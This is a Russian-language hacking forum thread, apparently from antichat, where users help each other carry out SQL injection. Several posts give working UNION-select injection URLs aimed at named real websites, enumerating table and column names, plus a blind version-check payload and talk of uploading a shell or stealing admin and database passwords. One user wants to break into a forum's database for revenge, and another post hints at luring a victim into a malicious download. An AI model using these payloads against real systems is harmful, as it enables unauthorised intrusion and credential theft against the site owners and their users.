А как сам думаешь? Вот ты нашел в данных с сниффера Pass_hash ??? Ответ напрашивается...человек в данный момент не авторизован на форуме. Подскажите с инъектом,я ток начал пробовать.. Code: http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+LIMIT+1,1+--+ Я так понял, что фильтруется кавычка, как можно это сделать иначе ?
Авторизирован. Я ему отослал на форуме лс: Привет.Зайди,скачай пак анекдотов. Он зашел и все.... ОН АВТОРИЗИРОВАН.
извиняюсь, версию недоглядел..автор, наверно, допустил опечатку http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,COLUMN_NAME,4,5,6+FROM+INFORMATI ON_SCHEMA.COLUMNS+WHERE+COLUMN_NAME='admin'+LIMIT+1 ,1+--+
http://sc-ufa.uraltb.ru/?id=4+UNION+SELECT+1,2,3+LIMIT+1,1/* можно ли сюда шелл залить или пароль получить от админки? или от БД
Шелл не зальешь. Файл прив выключен, есть экранирование кавычек. Прав на чтение mysql.user нет Версия мускула 5, можно узнать имена таблиц и столбцов Code: http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/* вот например таблица _a3access Code: http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/* Для просмотра меняшь limit. вот пример просмотра столбцов в этой же таблице Code: http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,column_name,3+from+INFORMATION_SCHEMA.columns+where+table_name=0x5F6133616363657373+limit+0,1/* Для просмотра других столбцов также меняешь лимит
При помощи MySql инъекции в конструкции select никак, потому что нет возможности использовать разделитель ";"
Подскажите: на сайте сделал так: https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=-1 На странице выпала стесно оштбочка следующего содержания: Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/dist/html/include/gen/forum.php on line 110 Вопрос: это и есть SQL-injection? Если да, то какие действия далее?(+union+select+nul-- ничего не дает, даже это: +union+select+@@version+)
В двух словах не рассказать. Ищи основы проведения инъекций. Либо можешь просмотреть сразу примеры: http://forum.antichat.ru/thread21336.html
Для начала, неплохо бы обратиться к статьям, их ведь не от нечего делать писали. http://forum.antichat.ru/thread43966.html
сначала проверь саму sql-inj данные выведутся не выведутся потом подбери количество столбцов ну а потом проверь версию и тд все можно вывести в одном столбце CONCAT_WS(0x3A,VERSION(),USER(),DATABASE()) з.ы. если не пройдут юнионы проверь через условие версию and+(ascii(substring(VERSION(),1,1))=51) з.з.ы вместо [что-то] надо подставить данные з.з.з.ы. это не алгоритм а лишь один из вариантов дальнейших действий
да и вобще, это MySQL, а не MSSql который та пытаешься пользовать, даже в сообщении об ошибках это видно
halkfild, даже при этом данные выводятся Блин, да что ж такое! Дело такое: ссылку дать не могу, поскольку использую для входа свой логин и пароль. Это типа мини-форум, на котором меня круто #@!&, написали от моего лица не совсем приличное! Единственный выход проникнуть в базу, узнать пароли. Сам я MySQL не знаю (только MSSQL ). halkfild, посоветуй, что нибудь ещё, очень прошу!
Понимаешь в чем беда, тут вариантов масса... Кстати попробуй закрыть кавычкой [реальный индекс]... Или кинь ссылку тогда в личку чтоле если так боишся выкладывать... PS это не "единственный выход" еще как вариант набить морду тому кто это сделал )
